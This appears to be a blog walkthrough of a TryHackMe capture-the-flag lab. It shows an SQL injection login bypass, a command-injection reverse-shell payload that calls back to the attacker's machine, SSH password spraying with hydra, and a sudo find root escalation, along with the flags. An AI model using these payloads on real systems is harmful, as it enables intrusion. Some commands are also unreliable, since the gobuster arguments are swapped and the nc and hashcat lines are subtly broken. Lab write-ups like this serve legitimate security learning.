Post cover image
One engagement stands between you and your next title.

June 3, 2026

TryHackMe’s “Operation Promotion” CTF Walkthrough

Started by enumerating the machine with nmap, found a few open ports:

Omer David

3 min read

nmap -sV -sS -T4 -p- [target_ip]
None

I ran gobuster to enumerate the web server's directories and found an admin login page.

gobuster dir -u /usr/share/wordlists/dirb/common.txt http://[target_ip]
None

The login page form was vulnerable to an SQL injection

' OR 1=1 -- -

In the /admin/dashboard.php path we had a user lookup tool that allowed us to view user record by providing an ID.

The user with the id of 7 had a note that exposed a path to a ping.php file which was vulnerable to command injection.

None

I was able to view the source code for ping.php by injecting the following code into the path

http://[target_ip]/admin/sysmaint-checks/ping.php?host=10.0.0.0%0acat%20ping.php
None

from this I was able to inject a reverse shell payload and gain access to www-data.

V LISTENER SET UP ON MY ATTACKBOX V
nc -lvnp 4444

V THIS WAS THE PAYLOAD INJECTED V
10.0.0.0%0arm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%20http%3A%2F%2F[attackbox_ip]%204444%20%3E%2Ftmp%2Ff

When reviewing /var/www/html/admin/index.php I found a call in the code to a database (/var/lib/recruitcorp/app.db).

Using sqlite3 to read the mentioned database.

None

I also found a password for a user name jford encrypted with bcrypt but was not able to crack the hash.

None

At this point I got completely stuck and to be honest, for the next part I had to get some ideas from other walkthroughs, to be completely transparent I think this solution is stupid, but that's the way this lab was built I guess.

Credit given to 0xb0b and his great walkthrough over at https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-promotion , for the next part of the solution.

When looking at the main page we can see the main theme is "spring 2026"

None

So with that in mind, we will create a custom wordlist that we will later use to password spray the user "jford" and gain access to his user via ssh.

We start by creating a text file containing the word "Spring2026"

echo Spring2026 > spring2026.txt

We will then use hashcat to transform our one word text file to a wordlist containing thousands of variations of our word.

hashcat --stdout spring.txt -r /usr/local/hashcat/rules/dive.rule > wordlist.txt

With that done we can use hydra to password spray the user "jford"

hydra -vv -l jford -P wordlist.txt 10.114.139.118 ssh
None

Now that we cracked the password for user jford we can connect to ssh and obtain the flag (THM{bdbee0a91ebcb0b0fafde931223efe09}) that is located in the user's home folder.

None

After investigating jford's permissions we were able to see he has root permissions to run the find command

sudo -l
None

That means we can get a shell as root by running the find command with the -exec flag (credit to gtfobins.org for this payload, check them out at https://gtfobins.org/gtfobins/find/#shell)

sudo find . -exec /bin/sh \; -quit

With that done we are now the root user and we're able to read the flag (THM{d999a1f6319a9c5b48c067dfab314ba2}) in the root directory.

None

Conclusion

In this very instructive CTF we began by enumerating the machine that led to finding a login page vulnerable to SQL injection. We were able to obtain a reverse shell thanks to a php script vulnerable to os command injection.

We were able to gain access to a privileged user name "jford" by creating a custom wordlist and using it to password spray them, this led to us obtaining the first flag as well as achieving root privileges and obtaining the second flag by running a command through jford with root permissions.

I learned a lot from this CTF and I hope you guys enjoyed it as well, thank you so much for reading this far!